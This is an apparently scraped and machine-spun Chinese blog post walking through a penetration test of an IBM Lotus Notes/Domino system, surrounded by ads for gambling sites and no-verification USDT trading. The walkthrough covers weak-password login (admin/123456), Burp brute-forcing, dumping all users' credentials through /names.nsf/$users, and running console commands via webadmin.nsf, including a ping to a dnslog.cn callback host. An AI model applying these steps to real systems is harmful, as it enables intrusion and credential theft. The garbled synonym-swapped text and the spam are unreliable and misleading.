皇冠体育寻求亚洲战略合作伙伴,皇冠代理招募中,皇冠平台开放会员注册、充值、提现、电脑版下载、APP下载。

首页科技正文

usdt不用实名交易(caibao.it):Getshell的途中

admin2021-01-0558安全技术众测渗透

一样平常下发义务对某站点举行渗透测试

查看js发现是IBM-Lotus Notes

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第1张

发现未授权接见一枚、并无卵用

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第2张

马上搜索该框架的破绽

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第3张

查看是否存在越权破绽/names.nsf/$users

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第4张

返回上岸界面、失败。
随手输入admin/123456弱口令进去了、啊这

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第5张

???治理员似乎上岸不了
使用爆破大法,通过burp爆破拿到了一个员工账户。
进去html代码都出来了,估量没人是个废弃的系统-0-。

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第6张

由于之前测试过这框架,老版本确实存在许多越权关系。实验删除url参数

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第7张

发现越权了、似乎是治理界面、楞是没找到上传点而且数据太多卡的一批

,

Allbet代理_ALLbet6.com

欢迎进入Allbet代理(Allbet Game):www.aLLbetgame.us,欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。

,

再实验/names.nsf/、获得了邮箱服务器地址+用户+电子邮箱

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第8张

接见names.nsf/$users 、 所有用户获取账户+密码

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第9张

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第10张

看了下用户时间- -都是14-16年的果然是个遗忘的废弃系统、然则这种资产就是我们最好的入手点。

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第11张

找了下IBM-Lotus Notes getshell的方式:
可通过webadmin.nsf接见控制台举行接口治理。Lotus Domino控制台提供了种种下令用于治理服务器。只要获取治理员权限后,就可以执行种种下令,造成下令执行。

普通用户无法越权到控制台

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第12张

我们使用刚刚的治理员用户上岸webadmin.nsf

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第13张

选择"Server"-"Status"-"Quick console",执行下令

usdt不用实名交易(caibao.it):Getshell的途中 安全技术 众测渗透 第14张

使用下令看看目的能不能出网先
load cmd /c ping gek6d6.dnslog.cn

没反应、尴尬。列位师傅另有什么getshell的路子莫。


网友评论

1条评论
  • 2021-01-05 00:07:28

    电银付激活码电银付(dianyinzhifu.com)是官方网上推广平台。在线自动销售电银付激活码、电银付POS机。提供电银付安装教程、电银付使用教程、电银付APP使用教程、电银付APP安装教程、电银付APP下载等技术支持。面对全国推广电银付加盟、电银付大盟主、电银付小盟主业务。我是不是很酷呢